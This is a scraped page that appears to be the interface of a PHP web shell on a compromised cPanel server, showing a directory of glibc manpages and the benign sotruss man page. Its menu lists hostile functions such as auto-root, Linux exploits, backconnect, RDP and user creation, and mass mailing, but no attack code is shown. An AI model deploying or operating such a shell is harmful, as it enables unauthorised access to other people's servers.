Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.7.151
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
glibc /
debian /
local /
manpages /
[ HOME SHELL ]
Name
Size
Permission
Action
de
[ DIR ]
drwxr-xr-x
es
[ DIR ]
drwxr-xr-x
fr
[ DIR ]
drwxr-xr-x
id
[ DIR ]
drwxr-xr-x
pl
[ DIR ]
drwxr-xr-x
po
[ DIR ]
drwxr-xr-x
Makefile
384
B
-rw-r--r--
gencat.1
5.59
KB
-rw-r--r--
getconf.1
5.29
KB
-rw-r--r--
locale-gen.8
2.91
KB
-rw-r--r--
locale-gen.8.sgml
4.58
KB
-rw-r--r--
locale.alias.5
1.67
KB
-rw-r--r--
locale.gen.5
1.41
KB
-rw-r--r--
nscd.8
1.99
KB
-rw-r--r--
nscd.conf.5
6.09
KB
-rw-r--r--
po4a.cfg
338
B
-rw-r--r--
pthread_atfork.3
1.98
KB
-rw-r--r--
pthread_cond_init.3
7.23
KB
-rw-r--r--
pthread_condattr_init.3
1.24
KB
-rw-r--r--
pthread_key_create.3
4.88
KB
-rw-r--r--
pthread_mutex_init.3
7.06
KB
-rw-r--r--
pthread_mutexattr_init.3
3.14
KB
-rw-r--r--
pthread_mutexattr_setkind_np.3
1.02
KB
-rw-r--r--
pthread_once.3
979
B
-rw-r--r--
rpcgen.1
11.07
KB
-rw-r--r--
sotruss.1
1.47
KB
-rw-r--r--
tzselect.1
2.28
KB
-rw-r--r--
update-locale.8
1.26
KB
-rw-r--r--
validlocale.8
1.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sotruss.1
.TH SOTRUSS "1" "May 2014" "sotruss" "User Commands" .SH NAME sotruss \- trace shared library calls through PLT .SH SYNOPSIS .B sotruss [\fI\,OPTION\/\fR...] [\fI\,--\/\fR] \fI\,EXECUTABLE \/\fR[\fI\,EXECUTABLE-OPTION\/\fR...] .SH DESCRIPTION .B sotruss is a small wrapper around .B ld.so that runs the specified .I executable until it exits. It intercepts and produce a trace of the dynamic library calls which are called by the executed process via the Procedure Linkage Table (PLT). It outputs the caller, the calle and the parameters as each call is executed. .SH OPTIONS .TP \fB\-F\fR, \fB\-\-from\fR FROMLIST Trace calls from objects on FROMLIST. .TP \fB\-T\fR, \fB\-\-to\fR TOLIST Trace calls to objects on TOLIST. .TP \fB\-e\fR, \fB\-\-exit\fR Also show exits from the function calls. .TP \fB\-f\fR, \fB\-\-follow\fR Trace child processes as they are created by currently traced processes as a result of the .BR fork(2) system call. .TP \fB\-o\fR, \fB\-\-output\fR FILENAME Write output to FILENAME (or FILENAME. in case \fB\-f\fR is also used) instead of standard error. .TP \-?, \fB\-\-help\fR Give this help list .TP \fB\-\-usage\fR Give a short usage message .TP \fB\-\-version\fR Print program version .SH AUTHOR Written by Ulrich Drepper. .SH COPYRIGHT Copyright \(co 2013 Free Software Foundation, Inc. .br This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. .SH "SEE ALSO" .BR ld.so(8).
Close